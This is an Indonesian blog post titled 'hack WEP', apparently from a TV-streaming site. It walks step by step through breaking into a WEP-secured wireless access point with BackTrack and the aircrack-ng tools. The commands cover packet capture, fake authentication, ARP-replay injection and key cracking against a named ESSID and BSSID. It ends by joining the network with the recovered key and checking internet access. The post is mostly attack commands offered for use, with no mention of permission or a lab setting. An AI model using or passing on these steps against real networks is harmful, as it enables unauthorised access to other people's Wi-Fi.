NONTON ACARA TV YUK

    Warung Bebas TV Streaming

    hack WEP


    Pada dasarnya setingan keamanan pada Akses Point (AP) terdiri dari beberapa mode, tetapi rata-rata menggunakan setingan yang simple untuk memudahkan pengaksessan. Karena terkadang semakin tinggi tingkat keamanan maka tingkat kenyamanan semakin berkurang. WEP adalah Wired Eqivalent Privacy, yang panjang key 64 bitnya hanya 10 digit bilangan heksadesimal atau 5 digit alpha-numeric, sedangkan untuk 128 bit key terdiri dari 26 digit heksadesimal atau 13 digit alpha-numeric. Algoritma pemograman wep tergolong ke dalam algoritma RC4, dimana terdapat kelemahan pada ekripsi ini yaitu adanya perulangan byte sehingga memungkinkan untuk dicrack jika variable ivs nya mencukupi.Saat melakukan proses hacking wep, menggunakan OS linuk turunan slackware yaitu backtrack versi 2.0 Final, dan menggunakan laptop Compaq V3103TU Presario V3000 dan menggunakan usb wireless adapter DWL G-122 rec C v.3.0.Secara umum langkah-langkahnya adalah sebagai berikut:
    1. Jalankan OS Back Track v.2.0 Final dengan Laptop. Lalu cek konfigurasi adapater usb wifi dengan meggunakan shell.Ketikkan:
    Ifconfig rausb0
    Iwconfig rausb0
    2. Setelah konfigurasi selesai, lalu jalankan airodump-ng untuk mengetahui channel berapa yang aktif, apa nama ssidnya, mac /client berapa saja yang sudah konek, ada tidaknya filrtering mac, yang tentunya untuk memudahkan kita melakukan monitoringdengan menggunakan shell ketikkan:
    airodump-ng rausb0
    3. Setelah mengetahui target berada di channel berapa, ssid nya apa, essid nya apa, ada tidaknya client yang konek, maka batalkan airodump-ng dari shell dengan menekan control+C. lalu misalnya kita ingin menyerang essid CIPUTIH bssid 00:18:f8:36:83:47 operasinya di channel 8, maka untuk menangkap paket yang dipancarkan oleh AP (Access Point) tersebut maka jalankan perintah:
    iwconfig rausb0 mode monitor channel 8
    airodump-ng -- channel 8 --ivs -w namafile rausb0
    shell ini jangan ditutup sampai mendapatkan key wep pada langkah aircrack-ng
    4. Setelah itu, jika aktivitas lan sedikit, artinya tidak ada client yang connect, harus menggunakan Fake Authentification dengan membuka shell baru, lalu ketikkan:
    Aireplay-ng -1 -30 -e CIPUTIH –a 00:18:f8:36:83:47 -h (mac address yang di izinkan konek) rausb0
    Lakukan fake authentification sampai muncul balasan jawaban:Authentification successfulKeep live sending packetLakukan terus sampai mendapatkan key wep pada langkah aircrack-ng
    5 Lalu jalan shell yang lain untuk melakukan injeksi arp request (dalam hal ini hanya card tertentu saja yang mendukung untuk melakukan injeksi), jalankan command:
    Aireplay-ng -3 –b 00:18:f8:36:83:47 -h (mac address yang di izinkan konek) rausb0
    Lalu tinggal menunggu agar paket arp injeksi terkirim dan paket arp request diterima, paket yang diterima berupa paket ivs ini akan tersimpan dalam file pertama tadi di atas ketika menjalan shell airodump-ng -- channel 8 --ivs -w namafile rausb0
    6. Untuk ngecrack password wep, sambil menunggu paket yang terkumpul, jalan shell baru ketikkan
    aircrack-ng –e CIPUTIH -b 00:18:f8:36:83:47 (namafile).ivs
    lalu aircrack-ng ini akan mencari semua kemungkinan key wepnya.Tunggu sampai mendapat display
    Key Found (B1:92:27:EF:6E) Probability 100%7. matikan shell airodump-ng, aireplay-ng, lalu buka shell baru. Lalu lakukan otentifikasi dengan cara:
    iwconfig rausb0 mode managed –e CIPUTIH key B1:92:27:EF:6E
    lalu lakukan otomatisasi dhcp dengan mengetikkan perintah:dhcpcd rausb0
    lalu lakukan ping ke salah satu web site misalnya:ping yahoo.com
    kalo jawaban dari ping TTL=bla bla berarti anda sudah terkoneksi ke internet

    Untuk membobol wep 64 bit biasanya banyaknya paket yang dibutuhkan sekitar 250 ribu ivs lebih, untuk wep 128 bit 500 ribu atau lebih.
    Reference: